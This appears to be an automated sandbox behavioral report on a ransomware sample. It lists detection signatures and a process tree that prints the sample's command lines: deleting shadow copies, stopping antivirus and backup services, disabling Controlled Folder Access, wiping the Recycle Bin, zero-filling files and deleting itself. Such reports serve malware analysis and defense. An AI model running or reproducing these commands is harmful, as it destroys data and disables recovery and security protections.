Analysis
-
max time kernel
171s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
09-01-2024 17:33
Behavioral task
behavioral1
Sample
58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
Resource
win7-20231215-en
Behavioral task
behavioral3
Sample
ae66e009e16f0fad3b70ad20801f48f2edb904fa5341a89e126a26fd3fc80f75.exe
Resource
win7-20231129-en
Behavioral task
behavioral4
Sample
c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
Resource
win7-20231215-en
General
-
Target
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
-
Size
91KB
-
MD5
be60e389a0108b2871dff12dfbb542ac
-
SHA1
14b4e0bfac64ec0f837f84ab1780ca7ced8d670d
-
SHA256
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d
-
SHA512
6051bec441434a80c34ee2752a3da9c3a0307cd1b551aa27a0f7f6f75b9bf64b172745d80f03eea054a03ebd2c493df21fd48d8fa3b706d46a6f7fee0e7c0641
-
SSDEEP
1536:QguHLgeS6umiCp31W4qYXgsLlOqrgB9GpF7LXdarTkCAKL5dsluhtvM4CoLT6QPg:D6seqCp31Hgsp9a9GTrda8CAKLTsWkyI
Malware Config
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Renames multiple (72) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Deletes itself 1 IoCs
Processes:
cmd.exepid process 2244 cmd.exe -
Drops startup file 1 IoCs
Processes:
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid process 1412 sc.exe 1972 sc.exe 2220 sc.exe 1256 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Interacts with shadow copies 2 TTPs 14 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exepid process 2340 vssadmin.exe 1356 vssadmin.exe 1588 vssadmin.exe 1344 vssadmin.exe 1280 vssadmin.exe 1784 vssadmin.exe 1760 vssadmin.exe 3068 vssadmin.exe 2100 vssadmin.exe 2260 vssadmin.exe 808 vssadmin.exe 776 vssadmin.exe 1808 vssadmin.exe 1068 vssadmin.exe -
Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 1844 taskkill.exe 2200 taskkill.exe 2268 taskkill.exe -
Modifies registry class 1 IoCs
Processes:
rundll32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000_Classes\Local Settings rundll32.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 2232 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exepid process 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
rundll32.exepid process 2164 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exetaskkill.exetaskkill.exetaskkill.exepowershell.exedescription pid process Token: SeDebugPrivilege 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe Token: SeDebugPrivilege 2200 taskkill.exe Token: SeDebugPrivilege 1844 taskkill.exe Token: SeDebugPrivilege 2268 taskkill.exe Token: SeDebugPrivilege 2468 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exepid process 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe -
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exepid process 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exenet.exenet.exenet.exenet.exedescription pid process target process PID 1792 wrote to memory of 2468 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe powershell.exe PID 1792 wrote to memory of 2468 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe powershell.exe PID 1792 wrote to memory of 2468 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe powershell.exe PID 1792 wrote to memory of 2468 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe powershell.exe PID 1792 wrote to memory of 1692 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1792 wrote to memory of 1692 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1792 wrote to memory of 1692 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1792 wrote to memory of 1692 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1792 wrote to memory of 2844 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1792 wrote to memory of 2844 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1792 wrote to memory of 2844 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1792 wrote to memory of 2844 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1792 wrote to memory of 3056 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1792 wrote to memory of 3056 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1792 wrote to memory of 3056 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1792 wrote to memory of 3056 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1792 wrote to memory of 2644 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1792 wrote to memory of 2644 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1792 wrote to memory of 2644 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1792 wrote to memory of 2644 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1792 wrote to memory of 2732 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1792 wrote to memory of 2732 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1792 wrote to memory of 2732 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1792 wrote to memory of 2732 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1792 wrote to memory of 2788 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1792 wrote to memory of 2788 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1792 wrote to memory of 2788 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1792 wrote to memory of 2788 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1692 wrote to memory of 2272 1692 net.exe net1.exe PID 1692 wrote to memory of 2272 1692 net.exe net1.exe PID 1692 wrote to memory of 2272 1692 net.exe net1.exe PID 1692 wrote to memory of 2272 1692 net.exe net1.exe PID 3056 wrote to memory of 2660 3056 net.exe net1.exe PID 3056 wrote to memory of 2660 3056 net.exe net1.exe PID 3056 wrote to memory of 2660 3056 net.exe net1.exe PID 3056 wrote to memory of 2660 3056 net.exe net1.exe PID 2844 wrote to memory of 1312 2844 net.exe net1.exe PID 2844 wrote to memory of 1312 2844 net.exe net1.exe PID 2844 wrote to memory of 1312 2844 net.exe net1.exe PID 2844 wrote to memory of 1312 2844 net.exe net1.exe PID 1792 wrote to memory of 2720 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1792 wrote to memory of 2720 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1792 wrote to memory of 2720 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1792 wrote to memory of 2720 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1792 wrote to memory of 2872 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1792 wrote to memory of 2872 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1792 wrote to memory of 2872 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1792 wrote to memory of 2872 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2644 wrote to memory of 2696 2644 net.exe net1.exe PID 2644 wrote to memory of 2696 2644 net.exe net1.exe PID 2644 wrote to memory of 2696 2644 net.exe net1.exe PID 2644 wrote to memory of 2696 2644 net.exe net1.exe PID 1792 wrote to memory of 2572 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1792 wrote to memory of 2572 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1792 wrote to memory of 2572 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1792 wrote to memory of 2572 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1792 wrote to memory of 2756 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1792 wrote to memory of 2756 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1792 wrote to memory of 2756 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1792 wrote to memory of 2756 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1792 wrote to memory of 2560 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1792 wrote to memory of 2560 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1792 wrote to memory of 2560 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1792 wrote to memory of 2560 1792 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe -
System policy modification 1 TTPs 2 IoCs
Processes:
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1" 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe"C:\Users\Admin\AppData\Local\Temp\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe"1⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1792 -
C:\Windows\SysWOW64\net.exe"net.exe" stop avpsus /y2⤵
- Suspicious use of WriteProcessMemory
PID:1692 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵PID:2272
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BMR Boot Service /y2⤵
- Suspicious use of WriteProcessMemory
PID:2644 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y3⤵PID:2696
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfewc /y2⤵
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵PID:2660
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y3⤵PID:1312
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵PID:2732
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y3⤵PID:2148
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooBackup /y2⤵PID:2808
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooBackup /y3⤵PID:1192
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵PID:900
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y3⤵PID:2544
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵PID:1508
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y3⤵PID:2792
-
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
PID:2340
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1844
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:1784
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp26C2.bat2⤵PID:2316
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin2⤵PID:760
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
PID:2260
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:808
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:776
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:1356
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:1808
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:1588
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:1760
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:1344
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:1280
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:3068
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:2100
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:1068
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2200
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2268
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
- Launches sc.exe
PID:1972
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
- Launches sc.exe
PID:2220
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
- Launches sc.exe
PID:1256
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
- Launches sc.exe
PID:1412
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sophos /y2⤵PID:1304
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵PID:2488
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcronisAgent /y2⤵PID:768
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcrSch2Svc /y2⤵PID:2596
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecRPCService /y2⤵PID:1624
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecManagementService /y2⤵PID:1540
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecJobEngine /y2⤵PID:1584
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵PID:2196
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵PID:1608
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵PID:1852
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop PDVFSService /y2⤵PID:1908
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop veeam /y2⤵PID:1744
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamNFSSvc /y2⤵PID:1520
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploymentService /y2⤵PID:2964
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamTransportSvc /y2⤵PID:2768
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VSNAPVSS /y2⤵PID:2772
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop stc_raw_agent /y2⤵PID:2984
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop zhudongfangyu /y2⤵PID:3028
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooIT /y2⤵PID:2580
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBCFMonitorService /y2⤵PID:2708
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵PID:2700
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBIDPService /y2⤵PID:2128
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBFCService /y2⤵PID:2560
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop RTVscan /y2⤵PID:2756
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SavRoam /y2⤵PID:2572
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccSetMgr /y2⤵PID:2872
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccEvtMgr /y2⤵PID:2720
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop DefWatch /y2⤵PID:2788
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2468
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵PID:2020
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
PID:2728
-
-
C:\Windows\SysWOW64\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵PID:2408
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe2⤵
- Deletes itself
PID:2244
-
-
C:\Windows\SysWOW64\notepad.exe"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt2⤵
- Opens file in notepad (likely ransom note)
PID:2232
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop veeam /y1⤵PID:1676
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y1⤵PID:2704
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y1⤵PID:2504
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y1⤵PID:1004
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y1⤵PID:2516
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y1⤵PID:488
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y1⤵PID:540
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y1⤵PID:1232
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y1⤵PID:2216
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y1⤵PID:2888
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y1⤵PID:2148
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y1⤵PID:2892
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sophos /y1⤵PID:1332
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y1⤵PID:2244
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 32⤵PID:612
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y1⤵PID:2188
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y1⤵PID:2608
-
